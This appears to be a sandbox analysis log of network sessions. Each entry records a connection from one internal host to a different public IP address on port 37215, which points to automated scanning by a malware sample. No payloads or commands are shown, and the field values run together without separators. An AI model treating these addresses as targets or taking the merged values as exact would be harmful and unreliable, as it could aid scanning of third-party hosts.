                                          17445192.168.2.235970641.183.37.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17446192.168.2.2349026155.144.140.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17447192.168.2.2341026157.239.52.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17448192.168.2.2341006197.125.152.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17449192.168.2.2353194157.95.180.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17450192.168.2.2351794197.47.173.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17451192.168.2.235599841.27.86.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17452192.168.2.2347746197.100.26.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17453192.168.2.235968441.210.251.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17454192.168.2.2347844111.145.237.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17455192.168.2.2338454157.130.54.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17456192.168.2.2336736197.2.207.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17457192.168.2.2334984197.131.94.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17458192.168.2.234921841.59.38.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17459192.168.2.2352476213.55.121.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17460192.168.2.2350332157.49.132.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17461192.168.2.2358166190.166.211.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17462192.168.2.2343958157.72.197.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17463192.168.2.2345646197.244.77.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17464192.168.2.2359356157.30.80.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17465192.168.2.235054241.217.78.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17466192.168.2.234508241.143.118.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17467192.168.2.235192241.237.190.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17468192.168.2.2360370157.217.90.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17469192.168.2.2345346197.74.40.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17470192.168.2.2360648157.99.84.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17471192.168.2.2360672157.70.57.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17472192.168.2.235045841.177.133.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17473192.168.2.233908641.202.175.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17474192.168.2.2341148104.41.114.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17475192.168.2.2349652166.51.59.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17476192.168.2.2349462157.188.3.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17477192.168.2.2348794157.32.88.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17478192.168.2.234395437.17.145.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17479192.168.2.2338724197.198.36.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17480192.168.2.2359626157.24.131.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17481192.168.2.2347332191.147.249.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17482192.168.2.2341426197.134.114.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17483192.168.2.2340852157.79.247.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17484192.168.2.2346976197.86.217.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17485192.168.2.2359302197.75.66.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17486192.168.2.2358754167.154.49.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17487192.168.2.2345752197.207.38.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17488192.168.2.233900640.143.64.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17489192.168.2.233922641.69.25.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17490192.168.2.2341356197.140.187.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17491192.168.2.2351086157.247.68.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17492192.168.2.233392041.36.5.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17493192.168.2.2357754157.140.117.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17494192.168.2.235872641.201.180.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17495192.168.2.2344942197.214.241.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17496192.168.2.235849041.148.155.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17497192.168.2.2333366197.212.219.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17498192.168.2.235212241.179.101.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17499192.168.2.2360860197.42.86.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17500192.168.2.2356318157.251.178.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17501192.168.2.2338444157.198.126.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17502192.168.2.2351194197.116.54.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17503192.168.2.2351304157.247.106.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17504192.168.2.2343502197.131.198.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17505192.168.2.2341190118.191.155.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17506192.168.2.235798094.71.135.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17507192.168.2.235706491.154.77.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17508192.168.2.2343716197.226.102.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17509192.168.2.234194484.114.204.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17510192.168.2.235917841.251.144.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17511192.168.2.2347410157.100.166.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17512192.168.2.2352886197.214.193.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17513192.168.2.2344620157.205.229.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17514192.168.2.23453668.212.131.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17515192.168.2.2340188157.6.231.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17516192.168.2.233477641.28.3.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17517192.168.2.2344762207.224.92.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17518192.168.2.234418441.216.85.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17519192.168.2.2354842157.0.58.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17520192.168.2.235978836.80.195.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17521192.168.2.2349460157.147.165.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17522192.168.2.235869641.242.16.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17523192.168.2.2343050157.109.13.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17524192.168.2.235831070.23.103.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17525192.168.2.2342884197.199.81.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17526192.168.2.2340110191.167.235.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17527192.168.2.235631041.138.216.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17528192.168.2.235683261.0.91.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17529192.168.2.2354784157.97.43.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17530192.168.2.2352832197.58.3.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17531192.168.2.233288241.56.95.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17532192.168.2.233381041.190.32.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17533192.168.2.2353438197.239.126.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17534192.168.2.234598475.227.73.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17535192.168.2.2351588197.193.200.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17536192.168.2.2360500157.181.237.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17537192.168.2.233296641.70.198.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17538192.168.2.235831041.237.95.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17539192.168.2.233885841.84.122.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17540192.168.2.2349094157.128.89.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17541192.168.2.2355778157.27.37.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17542192.168.2.2352472157.208.30.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17543192.168.2.2337178157.190.62.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17544192.168.2.2340916157.66.25.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17545192.168.2.235538695.32.247.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17546192.168.2.2345752157.120.56.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17547192.168.2.2344756157.220.97.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17548192.168.2.234162697.245.160.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17549192.168.2.2339772197.113.179.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17550192.168.2.2352486115.2.60.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17551192.168.2.234638241.192.239.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17552192.168.2.2338956157.188.153.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17553192.168.2.2337918197.98.130.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17554192.168.2.2355362197.123.123.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17555192.168.2.234335288.203.27.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17556192.168.2.2345742157.11.153.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17557192.168.2.2348726196.241.57.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17558192.168.2.2355416205.130.144.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17559192.168.2.233759235.17.127.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17560192.168.2.23405744.152.208.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17561192.168.2.2355040133.234.80.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17562192.168.2.234275041.104.240.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17563192.168.2.2341410112.3.74.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17564192.168.2.2338716197.151.15.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17565192.168.2.2333594157.146.67.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17566192.168.2.2343626197.128.88.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17567192.168.2.2356038157.102.228.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17568192.168.2.2343986157.160.75.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17569192.168.2.2339884157.166.138.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17570192.168.2.234902041.156.249.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17571192.168.2.2354742197.141.15.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17572192.168.2.234944841.234.168.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17573192.168.2.23461189.108.15.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17574192.168.2.234125875.78.55.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17575192.168.2.2359478153.159.33.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17576192.168.2.2351918222.223.68.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17577192.168.2.234781041.18.131.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17578192.168.2.2357098197.34.161.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17579192.168.2.2344596157.250.34.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17580192.168.2.2360914197.109.253.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17581192.168.2.236053817.107.102.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17582192.168.2.2342544152.1.118.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17583192.168.2.2358594117.128.128.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17584192.168.2.2347846157.21.80.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17585192.168.2.2353698157.157.9.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17586192.168.2.235322041.168.33.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17587192.168.2.2346226197.214.59.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17588192.168.2.2342418157.68.209.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17589192.168.2.2345812197.14.191.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17590192.168.2.234489658.32.136.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17591192.168.2.233849641.220.223.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17592192.168.2.2349824157.202.23.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17593192.168.2.233713464.17.76.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17594192.168.2.235794441.243.216.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17595192.168.2.233469441.120.31.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17596192.168.2.2340884157.234.241.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17597192.168.2.2341694197.50.31.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17598192.168.2.233638241.202.122.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17599192.168.2.234820042.18.38.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17600192.168.2.234542441.5.127.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17601192.168.2.235287459.178.226.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17602192.168.2.2348560197.192.9.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17603192.168.2.2357974157.81.218.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17604192.168.2.2351230197.28.40.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17605192.168.2.2345648157.143.231.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17606192.168.2.2344228157.160.141.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17607192.168.2.23421201.159.93.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17608192.168.2.2341818157.132.255.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17609192.168.2.2352410157.240.222.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17610192.168.2.2353218157.166.197.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17611192.168.2.2349872197.95.227.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17612192.168.2.235409241.215.42.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17613192.168.2.235016841.65.147.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17614192.168.2.2356700197.249.179.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17615192.168.2.233622641.228.231.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17616192.168.2.23357168.254.34.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17617192.168.2.2340752197.198.202.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17618192.168.2.2347066197.0.209.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17619192.168.2.2351420157.227.178.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17620192.168.2.2345112197.236.148.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17621192.168.2.2355600197.52.249.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17622192.168.2.2358060157.143.184.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17623192.168.2.2338214197.192.31.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17624192.168.2.2342958197.55.150.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17625192.168.2.2337766197.105.75.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17626192.168.2.2346108157.102.152.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17627192.168.2.234527462.167.58.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17628192.168.2.2347104197.100.88.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17629192.168.2.233648241.254.88.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17630192.168.2.234602041.182.183.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17631192.168.2.2346598157.241.142.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17632192.168.2.235928419.251.111.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17633192.168.2.2346504157.48.190.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17634192.168.2.234943041.24.238.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17635192.168.2.2359022128.67.111.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17636192.168.2.2350772197.187.228.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17637192.168.2.235946441.22.143.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17638192.168.2.2336624156.210.80.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17639192.168.2.2333722118.207.32.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17640192.168.2.2360576157.66.111.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17641192.168.2.2346804197.94.212.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17642192.168.2.2348374203.137.222.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17643192.168.2.2339622190.156.205.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17644192.168.2.234091041.197.101.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17645192.168.2.233450241.92.15.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17646192.168.2.235789641.53.22.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17647192.168.2.235704441.147.65.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17648192.168.2.2350844181.232.53.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17649192.168.2.2343380157.131.168.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17650192.168.2.234229861.245.62.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17651192.168.2.234705888.232.223.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17652192.168.2.233323841.188.5.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17653192.168.2.2346526197.148.46.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17654192.168.2.2345230157.86.113.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17655192.168.2.2356314197.212.111.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17656192.168.2.235133641.14.6.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17657192.168.2.2335198157.161.237.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17658192.168.2.2352060197.93.91.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17659192.168.2.2334390157.141.229.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17660192.168.2.2354652197.21.19.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17661192.168.2.2334894197.178.56.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17662192.168.2.2350470157.162.101.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17663192.168.2.235759884.120.191.7537215
                                          TimestampBytes transferredDirectionData


